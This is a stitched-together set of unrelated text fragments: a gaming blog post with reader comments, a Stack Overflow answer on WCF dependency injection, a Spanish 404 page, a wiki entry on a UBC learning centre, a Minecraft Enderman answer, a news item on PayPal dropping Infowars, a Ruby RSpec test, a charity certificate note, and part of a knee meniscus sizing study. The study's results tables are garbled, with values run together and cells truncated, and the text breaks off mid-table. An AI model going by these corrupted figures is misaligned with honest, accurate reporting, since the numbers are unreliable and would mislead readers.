week, I can play something else. ", "The first something else I played this year after Destiny 2 was what many people picked as their game of the year, but I wouldn't call it that exactly.", "\n\nExtra points if you can name the Christmas movie in the background\n\nThe Legend of Zelda Breath of the Wild is a really cool game with a steep learning curve compared to other Zelda games. ", "Once you understand some of the basic mechanics and mechanisms of the game, you fall into a routine where you explore an area, maybe find a shrine, clear it, visit a town, pick up a side quest or two, eventually take down a divine beast, and then keep going. ", "I don't mean to over simplify it, but that's all the game ever really seemed like to me. ", "Yeah, the world is big, and I enjoyed climbing towers and unlocking the map Far Cry style. ", "It was interesting having to switch back and forth between different armor sets to take advantage of different perks, and learning how to fight different enemies was cool, but honestly, I reached a point where I felt like it was just a lot of dots on a map. ", "There are a large number of things to do, but not very many of them feel meaningful. ", "Some of the shrines were okay, but many were super simple. ", "None of them gave me that Portal 2 feeling of accomplishment when I figured out the solution. ", "Right now I have one and a half rows of hearts, the entire map unlocked, 3/4 divine beasts defeated, and I have no itch to get back to it. ", "I will get back to it just to finish it, but I don't have that uncontrollable urge to get back to the game as soon as I get the chance.", "\n\nThe final game that I played this year is a game that I played for the first time in 2011 and when push comes to shove is the game that I still call my favorite game of all time. ", "SKYRIM!", "\n\nThis is a screen cap of Skyrim that I took on the Xbox One last year. ", "Nintendo won't let me transfer a screen cap without removing the microSD card. ", "Ain't nobody got time for that\n\nI don't know what to say about this game that hasn't already been said by myself or someone else. ", "Winner of over 200 Game of the Year awards back in 2011, not like that matters. ", "The only GOTY award that matters is your own. ", "This is a game that completely stands the test of time. ", "I played it on 360, a year later on PC, last year I bought the special edition on the Xbox One, and now I have it on Swtich. ", "And it keeps getting better every single time I play it. ", "What I will say specifically about the Switch version is that the visuals range from \"Every bit as good as the 360\" to \"Good Enough\". ", "Not sure how many hours I have into it but I'm somewhere around level 20, so a good bit. ", "I don't plan on stopping anytime soon but I will take a little break to play one of my Christmas presents, Super Mario Odyssey.", "\n\nThat's it guys! ", "I played three games and plan to play tons more hours of two of them, Next year I plan on playing at least five games: Destiny 2, Skyrim, Far Cry 5, Crackdown 3, and Kingdom Hearts 3 (unless it gets delayed, which it will).", "\n\nGlad to have you back on the site! ", "I really liked the 20 or so hours I spent with Destiny 2. ", "I haven't played BOTW yet as I need a Switch or WIIU in order to play it. ", "I'm with you on Skyrim. ", "I've played countless hours of this game and every time a new version is released I start over. ", "I'm looking forward to hearing your thoughts on Far Cry 5.", "\n\n400+ hours?? ", "Good lord man. ", "I don't think I've ever spent that much time with one game. ", "And that's considering I bought both Burnout Paradise and the new Doom on every platform they were released on, and am still playing Diablo III occassionally to this day. ", "That said, if you're still getting fun out of it then more power to you!", "\n\n@zophar53: I played through Breath of the Wild twice last year, and totaled around 380 hours. ", "I plan to play through it again this year, with all the new DLC and story stuff they've added. ", "But in the years I've been playing games, I've probably clocked well over 1000 hours on Diablo 2.", "\n\nSorry to hear BotW didn't grab you, Bil, but to each their own. ", "For me, it was a big deal, and one that I got a ton of enjoyment from.", "\n\nLogin or register to comment\n\nIt appears as though you are not a member of our site, or are not logged in.", "\n\nIt appears as though you can not comment currently. ", "Becoming able to comment though is easy! ", "All you need to do is register for the site! ", "Not only will you be able to access any other site features including the forum and collection tools. ", "If you are a registered user and just need to login then you can do so here.", "\n\nComment! ", "It's easy, thoughtful, and who knows you might just enjoy it!" ]
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[ "Q:\n\nWCF Attribute injection using an IOC Container\n\nUsing ASP.NET MVC I am able to replace the FilterProvider as so\n var oldProvider = FilterProviders.", "Providers.", "Single(f => f is FilterAttributeFilterProvider);\n FilterProviders.", "Providers.", "Remove(oldProvider);\n FilterProviders.", "Providers.", "Add(new CustomFilterProvider(_container));\n\nUsing my own custom provider. ", "It does not give me the ability to use a factory pattern to create the controller filter attributes but I do get the ability to use property injection to set dependencies the attributes may need using the container.", "\nIs it possible to do something similar using WCF so that I can inject dependencies (property injection is fine) into my user defined classes that derive from Attribute that I use on my service methods (the services are created using IOC)?", "\nI am using CastleWindsors WcfFacility, but a generalised solution (that applied to any container) would probably be a better answer.", "\n\nA:\n\nOne way to do this is to use the containers OnCreate method or similar and do something like the following at registration\n Container.", "Register(Component.", "For<IMyService>().ImplementedBy<MyService>().OnCreate(WireUpAttibutes).LifeStyle.", "Transient);\n\nthen have the following methods\n private static void WireUpAttibutes<T>(IKernel kernel, T instance) {\n var attributes = instance.", "GetType().GetCustomAttributes(typeof(MyAttribute), false);\n foreach (var attribute in attributes) {\n WireUp(kernel, attribute.", "GetType(), attribute);\n }\n }\n\n private static void WireUp(IKernel kernel, Type type, object instance) {\n var properties = type.", "GetProperties().Where(p => p.CanWrite && p.PropertyType.", "IsPublic);\n foreach (var propertyInfo in properties.", "Where(propertyInfo => kernel.", "HasComponent(propertyInfo.", "PropertyType))) {\n propertyInfo.", "SetValue(instance, kernel.", "Resolve(propertyInfo.", "PropertyType), null);\n }\n }\n\n" ]
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[ "Oops... Error 404\n\nLo sentimos, pero la página que busca no existe.", "\n\nPor favor verifique la dirección e inténtalo de nuevo." ]
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[ "Irving K. Barber Learning Centre\n\nThe Irving K. Barber Learning Centre (IKBLC) is a facility at the Vancouver campus of the University of British Columbia. ", "The Learning Centre is built around the refurbished core of the 1925 UBC Main Library. ", "The Centre is named for Irving. ", "K. Barber, philanthropist and a graduate of UBC.", "\n\nPrograms and services\nThe IKBLC provides library systems, education centre, library and a conduit of knowledge for lifelong learners and space for UBC Library's print collection and collections of rare and special materials.", "\n\nBC History Digitization Program\nStarted in 2006, the goal of the digitization program is to promote access to British Columbia's historical resources, with free online access to provincial historical materials.", "\n\nIndigitization \nThe Indigitization program supports Indigenous communities and organizations in British Columbia to digitize their cultural heritage materials by providing grant funding and digitization training. ", "The program is unique as it prioritizes communities' needs and ensures that communities retain copyright and control over their cultural heritage materials. ", "Indigitization is a joint project of IKBLC, the Museum of Anthropology, the iSchool at UBC, and Northern BC Archives (at UNBC), and continuously receives feedback from Indigenous project partners and grantees through initiatives such as the Indigenous Futures Forum held in 2016.", "\n\nMultimedia repository\nWebcasts of lectures are archived and accessible through the Webcasts Portal.", "\n\nChapman Learning Commons\nThe Chapman Learning Commons, in a refurbished central section of the Learning Centre, provides space for group work as well as seating for individual study. ", "It provides support and services for research and information literacy instruction, writing assistance, learning skills programs and technology through one-to-one help, workshops, peer mentoring and virtual resources and services.", "\n\nFacilities\n Collection space for 2,100,000 volumes including open stack shelving and 1,800,000 item capacity with the Automated Storage and Retrieval System (ASRS)\n Rare Books and Special Collections\n Climate-controlled vault for rare books and archives\n The Wallace B. and Madeline H. Chung Collection\n iSchool@UBC: School of Library, Archival and Information Studies (iSchool)\n Center for Teaching, Learning and Technology (CTLT)\n Gateway Programs – Arts One, Science One, Coordinated Arts and Coordinated Science\n Dodson and Lillooet Rooms\n 157-seat Victoria Learning Theatre\n Classrooms, seminar rooms, project rooms, boardrooms\n Ridington Reading Room and Musqueam Reading Room\n Ike’s Café with a seating capacity of more than 80 persons\n\nExternal links\n\n UBC Learning Commons\n Chapman Learning Commons\n Indigitization\n\nReferences\n\nCategory:University of British Columbia\nCategory:Academic Libraries at the University of British Columbia\nCategory:Academic libraries in Canada" ]
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[ "Q:\n\nDo Endermen teleport along valid paths?", "\n\nWhen an Enderman teleports, either by accident or after being angered, does it follow a continuous path to the destination? ", "If so, what are the requirements for such a path?", "\nMinecraft wiki made me think that they teleport similar to spawning, only with limited range. ", "Like they pick a spot within 32 blocks, then disappear and appear at that spot. ", "However, after some in-game observation, I'm now under the impression that their teleportation is the same as any mob's movement, only very fast (and perhaps with the ability to jump a little higher).", "\nTo give more specific example:\n\nthere's a room with ceiling 3 blocks above (enough to fit an Enderman)\nthe room is well-lit (mobs can't spawn)\nwalls are made of cobblestone (Endermen can't grief their way through)\none side is open, but a deep ravine (let's say, 70 block deep and 4 block wide) with no way around it lies between the room and a place where Endermen can spawn\n\nWill they be able to teleport into this room? ", "If true, then I suppose they don't need a path after all.", "\n\nA:\n\nFrom a decompiled 1.7.10 a teleportRandomly function is present in in the Enderman defintion.", "\nit is called if the Enderman is:\n\nwet\non fire\nin daylight & not fighting\nis fighting & is closer than 16 blocks to their target\n\n(in the last case there is a delay on how often this can be done).", "\nThe function generates an X, Y and Z coordinate and places the enderman to that location. ", " The function calls rand.nextDouble() or rand.nextInt(64) to generate a value within ±32 of the original value for each of X,Y and Z. It then calls another function a teleportTo() using these values\n(Alternatively if they are fighting and further away from their target, there is a teleport to entity function.)", "\nTherefore, an enderman, without being aggressive, can teleport anywhere within a cube of 64 blocks of itself (subject to having a floor, head room and not ending up in a liquid).", "\nSo, to answer the question, no pathing is considered, this teleportation is based on moving directly to a random location. ", "\nTL;DR If the room is within 32 blocks of a liquid or daylight and the ceiling is atleast 3 blocks high, an enderman \"could\" get in randomly without you having any previous contact with it.", "\n\n" ]
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[ "Alex Jones' Infowars has found itself cut off from yet another platform. ", "Having been booted from social media sites including Twitter and Facebook, as well as YouTube and the App Store, PayPal has now given it the elbow.", "\n\nThe online payment service has taken exception to Infowars' promotion of \"hate\" and \"discriminatory intolerance\" and has hit Jones' cash cow where it hurts -- in the wallet. ", "He has been given ten days to find a new payment processing service.", "\n\nSee also:\n\nJones and Infowars have faced increasing scrutiny in recent months, not only for their confrontational style, but also their promotion of conspiracy theories, demonstrably false narratives, and hate speech. ", "But in addition to using Infowars as a platform to spread his ideology and share his rants, Jones has long run a side-line in supplements which are estimated to net him millions of dollars each year.", "\n\nHaving been dropped by PayPal, Infowars is going to have a find a new way to allow people to pay for things such as its \"Brain Force Plus\" supplement.", "\n\nIn a statement about the matter, PayPal says:\n\nOur values are the foundation for the decision. ", "We undertook an extensive review of the Infowars sites, and found instances that promoted hate or discriminatory intolerance against certain communities and religions, which run counter to our core value of inclusion.", "\n\nPayPal has not pointed to any particular stories to explain its decision. ", "It seems to be more related to Infowars and Jones' general tone and attitude. ", "Infowars complains that the latest ban reveals \"big tech collusion with the left\".", "\n\nImage credit: Allmy / Shutterstock" ]
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[ "require \"spec_helper\"\n\nreturn unless defined?(ActiveRecord)\n\ndescribe \"Mobility::Plugins::AttributeMethods\", orm: :active_record do\n include Helpers::Plugins\n plugin_setup do\n active_record\n attribute_methods true\n reader\n end\n\n let(:untranslated_attributes) do\n {\n \"id\" => nil,\n \"slug\" => nil,\n \"published\" => nil,\n \"created_at\" => nil,\n \"updated_at\" => nil\n }\n end\n let(:model_class) do\n stub_const 'Article', Class.new(ActiveRecord::Base)\n Article.include(attributes)\n Article\n end\n\n describe \"#translated_attributes\" do\n it \"returns hash of translated attribute names/values\" do\n expect(backend).to receive(:read).once.with(Mobility.locale, {}).and_return('foo')\n expect(instance.translated_attributes).to eq('title' => 'foo')\n end\n end\n\n describe \"#attributes\" do\n it \"adds translated attributes to normal attributes\" do\n expect(backend).to receive(:read).once.with(Mobility.locale, {}).and_return('foo')\n expect(instance.attributes).to eq(untranslated_attributes.merge('title' => 'foo'))\n end\n end\n\n describe \"#untranslated_attributes\" do\n it \"returns original value of attributes method\" do\n expect(instance.untranslated_attributes).to eq(untranslated_attributes)\n end\n end\nend\n" ]
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[ "Menu\n\nCertificate of Appreciation from Circus Quirkus\n\nA huge thank you for your help this year with the Canberra Rotary Club’s 25th annual Special Children’s Festival – Circus Quirkus for the local special needs and disadvantaged children.", "\n\nPlease find attached your Certificate of Appreciation as our small way of saying “Thank you” for helping to make this annual event possible for the children. ", "Your support will also help us provide invaluable funding for Foodbank and also Our Place, our homeless youth programme. ", "Your support truly makes a difference.", "\n\nWe hope that all of the happiness you have helped to spread comes back to you ten-fold.", "\nUntil next year…." ]
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[ "Background {#Sec1}\n==========\n\nThe meniscus plays an important role in the kinematics of the knee joint, reduces contact pressure \\[[@CR1]\\], and improves joint stability \\[[@CR2], [@CR3]\\]. ", "These functions disappear after subtotal or total meniscectomy with resultant early osteoarthritis \\[[@CR4]\\].", "\n\nMeniscus allograft transplantation seems to be a valuable option for pain reduction and improvement of function in patients with (chronic) postmeniscectomy syndrome \\[[@CR5]\\]. ", "The first meniscus allograft transplantation was performed in 1989 \\[[@CR6]\\] and has been widely used with encouraging results. ", "Several studies demonstrated good or excellent short- to medium-term results \\[[@CR6]--[@CR12]\\]. ", "However, while midterm survivorship is reported to be 85--90%, long-term survivorship decreases to 50--70% \\[[@CR13]\\].", "\n\nReconstruction of a geometrically similar meniscus seems to be crucial for physiological joint pressure distribution \\[[@CR14]--[@CR21]\\] and good clinical results \\[[@CR22]--[@CR25]\\]. ", "Undersized grafts could lead to excessive loads due to poor congruity with the femoral condyle, while oversized grafts lose their function by extrusion from the compartment \\[[@CR14]\\]. ", "A mismatch of a few millimeters is supposed to result in poorer biomechanical outcomes \\[[@CR17], [@CR19], [@CR26]--[@CR29]\\] and increased degenerative changes \\[[@CR18], [@CR30]\\]. ", "Therefore, sizing should be as close to the native meniscus as possible.", "\n\nDifferent methods have been described to determine the size of a meniscus \\[[@CR4], [@CR31]--[@CR35]\\]. ", "Today, meniscus sizing is most commonly performed by conventional radiography according to the Pollard method \\[[@CR31]\\] or by magnetic resonance imaging (MRI) scans \\[[@CR32], [@CR33]\\], and the latter appears to be superior \\[[@CR33], [@CR36]\\]. ", "Unfortunately, inaccuracy of sizing is still a relevant problem in allograft surgery by these methods and has to be improved \\[[@CR17], [@CR25], [@CR31], [@CR36]--[@CR39]\\].", "\n\n3D meniscus sizing was recently proposed as a solution to increase the accuracy and precision of meniscus allograft selection \\[[@CR40]\\]. ", "The contralateral meniscus can be used as a very precise reconstruction template. ", "However, advantages of 3D-MRI sizing with the contralateral meniscus as a reconstruction template compared with existing sizing methods have not been shown to date. ", "We hypothesized that 3D-MRI sizing with the contralateral side is clearly superior compared with the currently used sizing methods.", "\n\nMethods {#Sec2}\n=======\n\nThe following description of the approaches used for the validation of the different sizing methods is divided into three parts. ", "Part 1 focuses on describing the basic material, imaging, and measurement methods. ", "Part 2 is dedicated to explaining the three different sizing methods in detail. ", "Finally, part 3 contains the sizing validation methods.", "\n\nPart 1: Material/imaging/measurements {#Sec3}\n-------------------------------------\n\n### Material {#Sec4}\n\nFifty patients with bilateral and 40 patients with unilateral complete imaging (34 men, 56 women; mean age 26.7 years (range 15--50)) were retrospectively included in this study. ", "All patients had a patellofemoral disorder. ", "The inclusion criteria were patients with available MRI scan and conventional radiography, mature skeletal age, healthy contralateral meniscus, and no tibio-femoral osteoarthritis (Kellgren and Lawrence grade 0) \\[[@CR41]\\]. ", "The presence of a completely closed growth plate at the distal femur and the proximal tibia in the MRI images was used to determine mature skeletal age. ", "Meniscus integrity was assessed by a fellowship-trained musculoskeletal radiologist, and the presence of meniscus tears, degeneration, or extrusion led to exclusion.", "\n\n### Imaging {#Sec5}\n\nAll radiographs (RX) were performed in a standard fashion, with a plain anteroposterior (AP) and lateral (LAT) view with the ampoule placed 1 m distant from the knee using calibrators for the correction of magnification (Optimus 50 X-ray Generator; Philips, USA).", "\n\nAll MRI scans were performed in our institution on a 3.0-T scanner (Skyra-fit, Siemens Healthineers, Erlangen, Germany) with a send/receive knee coil, and the patient was examined in the supine position. ", "All MRI examinations consisted of sagittal, coronal, and axial sequences as part of the standard MRI protocol \\[[@CR40]\\]: (1) coronal short tau inversion recovery (STIR) sequence (repetition time 4200 ms; echo time 34 ms; inversion time 210 ms; slice thickness 3 mm; number of slices 23; bandwidth 245 Hz/pixel; flip angle 150°; matrix 384 × 384; field of view 16 cm); (2) sagittal intermediate-weighted sequence with the Dixon technique (repetition time 4200 ms; echo time 39 ms; slice thickness 3 mm; number of slices 30; bandwidth 250 Hz/pixel; flip angle 150; matrix 448 × 448; field of view 16 cm), with in-phase image, and fat-suppressed water image; and (3) axial intermediate-weighted fat-suppressed sequence (repetition time 4990 ms; echo time 40 ms; slice thickness 2.5 mm; number of slices 39; bandwidth 150 Hz/pixel; flip angle 180; matrix 384 × 384; field of view 15 cm).", "\n\n### Measurement methods {#Sec6}\n\nThe complete dataset was further analyzed based on the following models and measurement methods: 3D surface model of medial and lateral meniscus;3D-calculated meniscal width, length, and height;2D-calculated meniscal width and length in MRI; and2D-derived meniscal width and length in RX.3D surface model of medial and lateral meniscus\n\n3D surface models were created, as described in a previous paper \\[[@CR40]\\], using the Materialise Interactive Medical Control System (MIMICS) 18.0 3D reconstruction software program (Materialise, Leuven, Belgium). ", "The segmentation of the medial and lateral meniscus was manually performed by two trained orthopedic surgeons in sagittal and coronal slides (biplanar). ", "Finally, all 3D surface models were smoothed (gap closing distance 0.0 mm, smallest detail 1.0 mm), and all left menisci were mirrored to the right surface models. ", "2)3D-calculated meniscal width, length, and height (Fig. [", "1](#Fig1){ref-type=\"fig\"}a)Fig. ", "1Measurement of meniscal width/length/height. **", "a** Width/length/height: meniscal dimensions are measured using an oriented bounding box. ", "The box was aligned to the meniscus roots, and the size was adjusted as long as the entire meniscus body was enclosed. ", "The dimensions of the meniscus correspond to the length of the sides of the box: *y*-axis (green arrow) = meniscal width; *x*-axis (red arrow) = meniscal length; *z*-axis (blue arrow) = meniscal height. **", "b** 2D-MRI sizing based on MRI of the contralateral side. **", "c** 2D-RX sizing according to Pollard on ipsilateral radiography\n\nThe 3D measurement of meniscal width, length, and height was performed in the same way as described in a previous paper \\[[@CR40]\\] with an oriented bounding box (= minimal-volume rectangular box that fully encloses the meniscal model) using the in-house developed planning software CASPA (Computed Assisted Surgery Planning Application, Balgrist CARD AG). ", "The box was initially automatically generated around the 3D models. ", "Then, the box was aligned parallel to a line from the anterior to the posterior meniscus root by rotation around the *z*-axis. ", "Finally, the box dimensions were adjusted as long as the entire meniscus body was enclosed. ", "Meniscus width (*y*-axis), length (*x*-axis), and height (*z*-axis) were now represented by the dimensions of the bounding box. ", "3)2D-calculated width and length in MRI (Fig. [", "1](#Fig1){ref-type=\"fig\"}b)\n\nFor the measurement of the 2D meniscal width and length in MRI, we used the following method. ", "The measurements were performed on axial slides with reference to sagittal slides. ", "Anterior and posterior meniscus roots were identified and connected by a first line. ", "Parallel to this, a second line was placed adjacent to the outer contour of the meniscal base. ", "Two additional lines, perpendicular to the first two lines, were set on the outer contours of the meniscus. ", "Thereby, a 2D bounding box was created. ", "The width and length of the meniscus corresponded to the dimensions of the box and could be measured. ", "4)2D-derived width and length in RX (Fig. [", "1](#Fig1){ref-type=\"fig\"}c)\n\nThe tibial plateau width was measured in the AP view perpendicular to the joint line as the distance between the margin of the tibial metaphysis to the medial lateral tibial eminence. ", "According to Pollard, meniscal width is supposed to be equal to the tibia plateau width for medial and lateral menisci \\[[@CR31]\\]. ", "Tibia plateau length was measured in the LAT view perpendicular to the joint line as the distance between the anterior surface of the tibia above the tuberosity to the posterior margin of the tibia plateau. ", "According to Pollard, the medial and lateral meniscal lengths can be calculated as 80% and 70%, respectively, of the tibia plateau length (medial meniscal length = 0.8 × tibia plateau length; lateral meniscal length = 0.7 × tibia plateau length).", "\n\nPart 2: Sizing methods {#Sec7}\n----------------------\n\nFor the 3D-MRI meniscus-sizing method and for the 2D-MRI meniscus-sizing method, we used the contralateral meniscus as a template \\[[@CR40]\\]. ", "Therefore, both sizing methods are direct sizing methods, i.e., they were compared with the size of the meniscus on the contralateral side. ", "For the 2D-RX sizing method, sizing was performed using an indirect calculation based on the bony anatomy of the same side \\[[@CR31]\\]. ", "3D-MRI meniscus sizing (Fig. [", "2](#Fig2){ref-type=\"fig\"})Principle: Direct meniscus sizing, based on the mean surface distance (MeSD) of the contralateral meniscus.", "Requirements: MRI scan of the healthy contralateral knee and 3D surface models of the allografts.", "Surface distance: The similarity of two objects can be represented by the closest surface point distance as previously described \\[[@CR40]\\]. ", "To this end, the objects were automatically superimposed by using the iterative closest point (ICP) algorithm so that the distances of all surface points from one object to the other (and vice versa) were as small as possible. ", "The maximum surface distance (MaSD) is the widest measured distance, and the MeSD is the mean of all surface distances. ", "For this analysis, the Hausdorff distance, the highest distance value between the two objects, was used (Fig. [", "3](#Fig3){ref-type=\"fig\"}).Allograft selection: The best fitting allografts were selected based on the closest MeSD values between the 3D template and all available 3D allograft surface models.2)2D-MRI meniscus sizingPrinciple: Direct meniscus sizing, based on calculated meniscal width and length of the contralateral meniscus.", "Requirements: MRI scan of the healthy contralateral knee, and the measured width and length of the allografts.", "Allograft selection: The best fitting allografts were selected by the smallest differences in width and length between the calculated sizes and the available allografts.3)2D-RX meniscus sizingPrinciple: Indirect meniscus sizing, based on derived meniscal width and length calculated from the measurement of the ipsilateral tibia plateau according to Pollard \\[[@CR31]\\].Requirements: Conventional radiography of AP and mediolateral view of the ipsilateral side with calibrators.", "Allograft selection: The best fitting allografts were selected by the smallest differences in width and length between the calculated sizes and the available allografts.", "Fig. ", "23D meniscus sizing (3D-MRI sizing). **", "a** Right knee with missing medial meniscus. **", "b** MRI scan of the contralateral side. **", "c** Meniscus segmentation and mirroring (see also Fig. [", "1](#Fig1){ref-type=\"fig\"}). **", "d** Meniscus matching by all menisci in the tissue bank by mean and maximum surface distances (see also Fig. [", "3](#Fig3){ref-type=\"fig\"}). **", "e** Selection of best fitting meniscus for meniscus allograft surgeryFig. ", "3Surface distance (SD). ", "The SD between two 3D models can be calculated after automatic superimposition by using the iterative closest point algorithm so that the distances of all surface points from one model to the other (and vice versa) are as small as possible. ", "Maximum SD (MaSD) is calculated as the widest distance between \"meniscus A\" and \"meniscus B.\" The mean SD (MeSD) is the mean value of all surface points between \"meniscus A\" and \"meniscus B.\" For this analysis, the Hausdorff distance, i.e., the highest values, is used\n\nPart 3: Sizing validation {#Sec8}\n-------------------------\n\nFirst, different terms must be clearly defined for better understanding. ", "The missing meniscus---i.e., after meniscectomy---is hereby called the \"original meniscus.\" ", "The 3D meniscus surface model for meniscus sizing is hereby called the \"template meniscus.\" ", "The best fitting meniscus that was selected by a particular sizing method is hereby called the \"selected meniscus.\" ", "In other words, we used different sizing methods of the template meniscus to choose the selected meniscus and then compared the selected meniscus with the original meniscus.", "\n\nBecause sizing with surface distances does not allow a simple comparison of two values (i.e., width and length) of the original and selected meniscus, as was done in previous studies, sizing validation had to be performed by a more complex simulation (see Fig. [", "4](#Fig4){ref-type=\"fig\"}). ", "Therefore, the 50 patients with bilateral imaging served as the \"validation group,\" resulting in 100 (= 50 right and 50 left) different medial and lateral menisci. ", "An imaginary tissue bank (\"allograft pool\") was composed of all 100 menisci, together with the menisci from the unilateral imaging of another 40 patients, resulting in 140 different menisci. ", "The menisci of each tested patient in the validation group were excluded from the potential menisci that could be selected for them, which finally resulted in an allograft pool of 138 different medial and lateral menisci. ", "Therefore, for the validation group, we needed bilateral MRI scans to compare the previously described sizing methods. ", "For the additional patients, this was not necessary, and we aimed to have as many allografts as possible in our tissue bank. ", "Fig. ", "4Validation. ", "The validation was repeated for each of the 100 menisci from the 50 patients as follows (\"validation group\"): meniscus No. ", "1 of patient No. ", "1 was removed from the available pool. ", "The sizing was performed by the \"template meniscus.\" ", "The 3D surface model of the ipsilateral side (\"original meniscus\") served as the best possible allograft (gold standard). ", "The 3D surface model of the contralateral side corresponded to the 3D-MRI sizing. ", "The meniscal width/length of the contralateral side in MRI corresponded to the 2D-MRI sizing. ", "The derived meniscal width/length by the ipsilateral tibia plateau in RX corresponded to the 2D-RX sizing method. ", "The best match (\"selected meniscus\") out of the \"allograft pool\" was selected based on the different \"template menisci.\" ", "Finally, the \"selected meniscus\" was compared with the \"original meniscus.\" ", "This procedure was repeated for all 100 menisci of the \"validation group\"\n\nThe simulation was then performed for each meniscus (meniscus No. ", "1 to meniscus No. ", "100) of the validation group. ", "An in-house developed computer program automatically calculated the closest MeSD and MaSD between all 100 original (validation group) and 138 different allografts (allograft pool). ", "Overall, there were 13,800 possibilities for allograft selection by MeSD (= 100 originals × 138 allografts), and the 100 closest menisci served as the best possible allografts, which served as the gold standard. ", "In a second step, the same validation was now performed by the contralateral meniscus surface model as the template, which corresponds to the 3D-MRI sizing. ", "Of the 13,800 possibilities, only the best fitting allografts by this sizing method were selected. ", "In a third step, validation was performed using the closest difference in measured width and length of the contralateral side in MRI (2D-MRI sizing) and 3D measured width and length. ", "Thereby, width and length were equally weighted and selected by the lowest error sum of squares: (width~sized~−width~allograft~)^2^ + (length~sized~−length~allograft~)^2^. In a fourth step, the same procedure was repeated based on the closest difference in derived width and length of the ipsilateral side (2D-RX sizing).", "\n\nFinally, the original meniscus was compared with the selected menisci resulting from the different sizing methods using the surface distance as well as the meniscal width, length, and height as similarity measurements.", "\n\nMeniscus outliers were defined as those with a difference between the original and selected meniscus over 5 mm in width, over 5 mm in length, or over 4 mm in height.", "\n\nInter-rater/intra-rater reliability {#Sec9}\n-----------------------------------\n\nThe first 30 knee joints---in alphabetic order based on patient names---were used to calculate interclass correlation. ", "3D surface models (3D-MRI sizing), as well as width/length in MRI (2D-MRI sizing) and X-ray (2D-RX sizing), were calculated by two trained orthopedic surgeons, as described above. ", "Intra-rater reliability was calculated by the repetition of these measurements by one of the surgeons.", "\n\nStatistics {#Sec10}\n----------\n\nThe statistical analysis was performed with SPSS (IBM Corp. IBM SPSS Statistics for Windows, version 24.0. ", "Armonk, NY: IBM Corp.) Descriptive analyses and independent-sample *t* tests were performed to investigate the meniscal diversity. *", "P* values below 0.05 were considered statistically significant. ", "The correlations between width/length and MeSD/MaSD were analyzed with a linear regression analysis (Pearson correlation coefficient). ", "Inter-rater and intra-rater reliability was calculated using interclass correlation coefficients (ICCs) (two-way mixed, absolute agreement). ", "We used scatterplots and boxplots for visual presentation.", "\n\nResults {#Sec11}\n=======\n\nMeniscus diversity (of the allograft tissue bank) {#Sec12}\n-------------------------------------------------\n\nOverall, the medial meniscus (*n* = 140) was on average 31.6-mm (standard deviation (Std) ± 3.3 mm) wide, 46.8-mm (Std ± 3.7 mm) long, and 9.3-mm (Std ± 1.4 mm) high. ", "The correlation between meniscal width and length was poor (*R*^2^ = 0.310).", "\n\nThe MeSD for all 140 medial surface models (*n* = 140 × 139 = 19,460) was on average 1.3 mm (Std ± 0.41 mm; min--max 0.57--3.70 mm), and the MaSD was on average 7.6 mm (Std ± 2.72 ; min--max 2.3--19.9 mm). ", "The correlation between MeSD and MaSD values was *R*^2^ = 0.430 (Fig. [", "5](#Fig5){ref-type=\"fig\"}). ", "Fig. ", "5Correlations between the MeSD and MaSD values. ", "Scatterplot of all 38,920 possibilities of medial and lateral meniscus combinations (38,920 = 140 × 139 for medial and 140 × 139 for lateral meniscus). ", "MaSD = maximum surface distance; MeSD = mean surface distance. ", "Six meniscus examples with increasing mismatch by increasing MaSD and MeSD values\n\nThe lateral meniscus (*n* = 140) was on average 31.7-mm (Std ± 3.7 mm) wide, 35.3-mm (Std ± 2.8 mm) long, and 9.9-mm (Std ± 1.4 mm) high. ", "The correlation between meniscal width and length was poor (*R*^2^ = 0.304).", "\n\nThe MeSD for all lateral surface models (*n* = 140 × 139 = 19,460) was on average 1.4 mm (Std ± 0.45 mm; min--max 0.449--3.89 mm), and the MaSD was on average 7.1 mm (Std ± 2.55; min--max 2.00--20.2 mm). ", "The correlation between MeSD and MaSD values was *R*^2^ = 0.495 (Fig. [", "5](#Fig5){ref-type=\"fig\"}).", "\n\nSizing validation {#Sec13}\n-----------------\n\nAll results are summarized in Tables [1](#Tab1){ref-type=\"table\"} and [2](#Tab2){ref-type=\"table\"} and Figs. [", "6](#Fig6){ref-type=\"fig\"} and [7](#Fig7){ref-type=\"fig\"}. ", "Table 1Results for the medial meniscusMedial meniscus*N* =100Best possible3D MRI2D MRI2D RXMean surface distance (MeSD)Mean (mm)0.740.851.071.27Min--max (mm)0.57--1.010.62--1.200.61--1.930.71--2.46Std0.*p* value best--0.001\\< 0.001\\< 0.001*p* value 3D MRI----\\< 0.001\\< 0.001*p* value 2D MRI------\\< 0.001Maximum surface distance (MaSD)Mean (mm) (mm)2.34--9.842.52--10.52.49--14.13.23--15.4Std1.261.612.432.53*p* value best--0.002\\< 0.001\\< 0.001*p* value 3D MRI----\\< 0.001\\< 0.001*p* value 2D MRI------0.002Width differenceMean (mm) (mm)0--7.70--7.40.1--12.20--10.4Std1.*p* value best--0.1260.006\\< 0.001*p* value 3D MRI----1.0000.017*p* value 2D MRI------0.275Length differenceMean (mm) (mm)0--11.60--11.60.1--8.30.2--12.3Std1.*p* value best--0.9110.009\\< 0.001*p* value 3D MRI----0.476\\< 0.001*p* value 2D MRI------\\< 0.001Height differenceMean (mm) (mm)0--2.80--5.70--4.20--4.6Std0.*p* value best--1.0000.056\\< 0.001*p* value 3D MRI----0.3880.002*p* value 2D MRI------0.531Outliers\\*W/L/H5102258MaSD051758*Std* standard deviation, *Min* minimum, *Max* maximum, *W* width, *L* length, *H* height, *MaSD* maximum surface distance\\*Outliers were defined as *W* (width difference) \\> 5 mm, *L* (length difference) \\> 5 mm, *H* (height difference) \\> 4 mm, or MaSD (maximal surface distance) \\> 5 mmTable 2Results for the lateral meniscusLateral meniscusBest possible3D MRI2D MRI2D RXMean surface distance (MeSD)Mean (mm)0.770.891.071.17Min--max (mm)0.611--1.100.611--1.380.701--2.010.720--2.29Std0.*p* value best--\\< 0.001\\< 0.001\\< 0.001*p* value 3D MRI----\\< 0.001\\< 0.001*p* value 2D MRI------0.007Maximum surface distance (MaSD)Mean (mm)4.044.905.896.46Min--max (mm)2.43--11.22.59--12.32.73--16.82.69--14.5Std1.321.702.212.27*p* value best--0.010\\< 0.001\\< 0.001*p* value 3D MRI----0.002\\< 0.001*p* value 2D MRI------0.208Width differenceMean (mm) (mm)0--7.20--7.90--11.70.1--10.7Std1.*p* value best--0.2530.016\\< 0.001*p* value 3D MRI----1.0000.015*p* value 2D MRI------0.242Length differenceMean (mm) (mm)0.1--7.70--10.00--9.80--8.0Std1.*p* value best--0.1760.388\\< 0.001*p* value 3D MRI----1.0000.475*p* value 2D MRI------0.221Height differenceMean (mm) 